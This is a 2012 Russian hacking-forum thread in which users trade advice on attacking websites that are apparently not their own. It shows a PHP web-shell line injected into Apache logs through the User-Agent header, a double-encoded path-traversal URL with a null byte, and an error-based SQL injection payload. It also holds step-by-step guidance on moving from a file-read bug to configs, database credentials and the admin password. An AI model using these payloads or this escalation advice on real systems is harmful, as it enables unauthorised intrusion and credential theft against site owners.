Ваши вопросы по уязвимостям.

16.07.2012, 09:30

jasp3r

Познающий

Регистрация: 23.04.2012

Сообщений: 44

С нами: 7396886

Репутация: 0

в модуле блогов на phpbb нашел xss(пасивку), но почему-то кроме настроек чата и phpsession больше ничего на сниффер не приходит.

вот сама xss

𝕏 Twitter Reddit Telegram Копировать ссылку

16.07.2012, 09:54

Ereee

Постоянный

Регистрация: 01.12.2011

Сообщений: 560

С нами: 7604246

Репутация: 267

Цитата:

Сообщение от gateout

на сайт в логи apache засунул через User-agent
'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>
Захожу http://site.com/attachment/..%252F..%252F..%252F..%252F..%252F..%252F..%252F. .%252F..%252F..%252Fvar%252Flog%252Fapache2%252F_c ustom.log%2500.jpg
и вижу содержимое лог файла включая
91.221.56.225 - - [15/Jul/2012:21:47:24 +0400] "GET / HTTP/1.1" 200 64697 "-" "'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>"
Но php-получается не исполняется. Что делать?

Ты спалил URL

Я тоже попробывал проинклюдить логи, но там не инклюд, а читалка. Теперь читай конфиги => phpmyadmin => пароль админа => admin.твой_сайт.ru.

16.07.2012, 10:38

gateout

Новичок

Регистрация: 10.07.2012

Сообщений: 15

С нами: 7284566

Репутация: 0

Да, я понял, что не include (к сожалению поздновато). посмотрю по поводу phpMyadmin. Подправил сообщение с сайтом)промашка вышла, спасибо.

16.07.2012, 13:13

ex'pert

Новичок

Регистрация: 28.05.2011

Сообщений: 19

С нами: 7873526

Репутация: -3

Подскажите что можно сделать при найденном sql выдало ошибку:

Код:

Script: /index.php 
Line: 138 
Error(1062):Duplicate entry '4CuiUaxdwIo1' for key 'group_key' 
in query: UPDATE mod_offers SET count_out=(count_out+1) WHERE id=''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(85),CHAR(97),CHAR(120),CHAR(100),CHAR(119),CHAR(73),CHAR(111)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and''

16.07.2012, 13:17

OxoTnik

Постоянный

Регистрация: 10.06.2011

Сообщений: 939

С нами: 7854806

Репутация: 173

Цитата:

Сообщение от ex'pert

Подскажите что можно сделать при найденном sql

Взломать!

16.07.2012, 13:30

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

С нами: 10095779

Репутация: 137

Цитата:

Сообщение от ex'pert

Подскажите что можно сделать при найденном sql выдало ошибку:

Код:

Script: /index.php 
Line: 138 
Error(1062):Duplicate entry '4CuiUaxdwIo1' for key 'group_key' 
in query: UPDATE mod_offers SET count_out=(count_out+1) WHERE id=''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(85),CHAR(97),CHAR(120),CHAR(100),CHAR(119),CHAR(73),CHAR(111)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and''

Цитата:

Сообщение от OxoTnik

Взломать!

Доработать скрипт, поставить фильтрации, сделать какую нить систему логов которая при ошибках админу давала знать о выявленых ошибках, смотря с какой стороны тут посмотреть)))

16.07.2012, 18:04

gateout

Новичок

Регистрация: 10.07.2012

Сообщений: 15

С нами: 7284566

Репутация: 0

phpmyadmin на сайте не оказалось, насколько я понял. Нашел параметры подключения к БД, но логины/ пароли цепляются из БД. подскажите, куда дальше двигаться?

то есть исходные данные:

1) есть читалка, то есть могу прочитать данный из файлов на сервере.

2) есть phpinfo

3) есть параметры подключения к БД,

как продолжить атаку?

16.07.2012, 19:11

Expl0ited

Познавший АНТИЧАТ

Регистрация: 16.07.2010

Сообщений: 1,022

С нами: 8328566

Репутация: 935

Цитата:

Сообщение от gateout

phpmyadmin на сайте не оказалось, насколько я понял. Нашел параметры подключения к БД, но логины/ пароли цепляются из БД. подскажите, куда дальше двигаться?
то есть исходные данные:
1) есть читалка, то есть могу прочитать данный из файлов на сервере.
2) есть phpinfo
3) есть параметры подключения к БД,
как продолжить атаку?

Читай сорцы двига, ищи еще баги